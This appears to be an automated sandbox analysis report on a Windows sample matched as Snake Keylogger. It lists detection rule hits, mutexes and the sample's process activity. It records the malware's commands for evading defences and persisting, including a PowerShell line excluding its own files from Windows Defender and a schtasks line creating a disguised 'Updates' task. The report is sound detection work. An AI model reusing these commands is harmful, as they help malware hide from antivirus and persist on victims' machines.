Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_07094128	0_2_07094128
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_07091230	0_2_07091230
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_070911F8	0_2_070911F8
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_078EA578	0_2_078EA578
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_078E0040	0_2_078E0040
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_078E4BD8	0_2_078E4BD8
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_078E4BE8	0_2_078E4BE8
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_078E5588	0_2_078E5588
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_078E5598	0_2_078E5598
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_078E34B0	0_2_078E34B0
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_078E38E8	0_2_078E38E8
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_078E0006	0_2_078E0006
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_078E3078	0_2_078E3078
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 8_2_02886108	8_2_02886108
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 8_2_0288C751	8_2_0288C751
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 8_2_0288B4A0	8_2_0288B4A0
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 8_2_0288C470	8_2_0288C470
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 8_2_02884AD9	8_2_02884AD9
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 8_2_0288CA31	8_2_0288CA31
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 8_2_02886880	8_2_02886880
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 8_2_02889858	8_2_02889858
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 8_2_0288BEB0	8_2_0288BEB0
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 8_2_0288B4F3	8_2_0288B4F3
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 8_2_02883570	8_2_02883570
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_01583E34	9_2_01583E34
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_0158E124	9_2_0158E124
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_01586F90	9_2_01586F90
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_06476BA2	9_2_06476BA2
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_06476BB0	9_2_06476BB0
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_07D49975	9_2_07D49975
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_07D40040	9_2_07D40040
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_07D45598	9_2_07D45598
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_07D45588	9_2_07D45588
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_07D434B0	9_2_07D434B0
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_07D44BD8	9_2_07D44BD8
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_07D44BE8	9_2_07D44BE8
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_07D438E8	9_2_07D438E8
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_07D43078	9_2_07D43078
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_07D40006	9_2_07D40006
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_091E4117	9_2_091E4117
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_091E1240	9_2_091E1240
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_091E3668	9_2_091E3668
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_091E6D08	9_2_091E6D08
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_091E11F8	9_2_091E11F8
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 9_2_091E1230	9_2_091E1230
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 13_2_01256108	13_2_01256108
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 13_2_0125C190	13_2_0125C190
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 13_2_0125B328	13_2_0125B328
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 13_2_01259540	13_2_01259540
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 13_2_0125C470	13_2_0125C470
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 13_2_01256730	13_2_01256730
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 13_2_0125C751	13_2_0125C751
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 13_2_0125BBD2	13_2_0125BBD2
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 13_2_0125CA31	13_2_0125CA31
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 13_2_01254AD9	13_2_01254AD9
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 13_2_0125BEB0	13_2_0125BEB0
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 13_2_01253570	13_2_01253570
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Code function: 13_2_0125B4F2	13_2_0125B4F2

Source: VQsnGWaNi5.exe

Static PE information: invalid certificate

Source: VQsnGWaNi5.exe, 00000000.00000002.1729092792.0000000003A8A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs VQsnGWaNi5.exe
Source: VQsnGWaNi5.exe, 00000000.00000000.1694044184.00000000005E9000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameKzwA.exeJ vs VQsnGWaNi5.exe
Source: VQsnGWaNi5.exe, 00000000.00000002.1739303619.00000000075B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs VQsnGWaNi5.exe
Source: VQsnGWaNi5.exe, 00000000.00000002.1739626697.0000000007830000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs VQsnGWaNi5.exe
Source: VQsnGWaNi5.exe, 00000000.00000002.1722628920.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs VQsnGWaNi5.exe
Source: VQsnGWaNi5.exe, 00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs VQsnGWaNi5.exe
Source: VQsnGWaNi5.exe, 00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs VQsnGWaNi5.exe
Source: VQsnGWaNi5.exe, 00000000.00000002.1725694272.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs VQsnGWaNi5.exe
Source: VQsnGWaNi5.exe, 00000008.00000002.1863654671.0000000000422000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs VQsnGWaNi5.exe
Source: VQsnGWaNi5.exe	Binary or memory string: OriginalFilenameKzwA.exeJ vs VQsnGWaNi5.exe

Source: VQsnGWaNi5.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.VQsnGWaNi5.exe.3b4e980.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VQsnGWaNi5.exe.3b4e980.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.VQsnGWaNi5.exe.3b4e980.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VQsnGWaNi5.exe.3b4e980.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.VQsnGWaNi5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.VQsnGWaNi5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.VQsnGWaNi5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.VQsnGWaNi5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.ywKvCTGbQjXP.exe.422f900.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.ywKvCTGbQjXP.exe.422f900.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.ywKvCTGbQjXP.exe.422f900.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.ywKvCTGbQjXP.exe.422f900.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.VQsnGWaNi5.exe.3b4e980.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VQsnGWaNi5.exe.3b4e980.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VQsnGWaNi5.exe.3b4e980.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: VQsnGWaNi5.exe PID: 6532, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: VQsnGWaNi5.exe PID: 6532, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: VQsnGWaNi5.exe PID: 7284, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: VQsnGWaNi5.exe PID: 7284, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: ywKvCTGbQjXP.exe PID: 7384, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: ywKvCTGbQjXP.exe PID: 7384, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: VQsnGWaNi5.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ywKvCTGbQjXP.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@29/15@2/2

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe

File created: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6972:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Mutant created: \Sessions\1\BaseNamedObjects\HgIhfPSIfIFXgxHBZwrrJvfVXj
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3704:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe

File created: C:\Users\user\AppData\Local\Temp\tmpEED9.tmp

Jump to behavior

Source: VQsnGWaNi5.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: VQsnGWaNi5.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: VQsnGWaNi5.exe	Virustotal: Detection: 75%
Source: VQsnGWaNi5.exe	ReversingLabs: Detection: 86%

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe

File read: C:\Users\user\Desktop\VQsnGWaNi5.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\VQsnGWaNi5.exe "C:\Users\user\Desktop\VQsnGWaNi5.exe"
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VQsnGWaNi5.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpEED9.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Users\user\Desktop\VQsnGWaNi5.exe "C:\Users\user\Desktop\VQsnGWaNi5.exe"
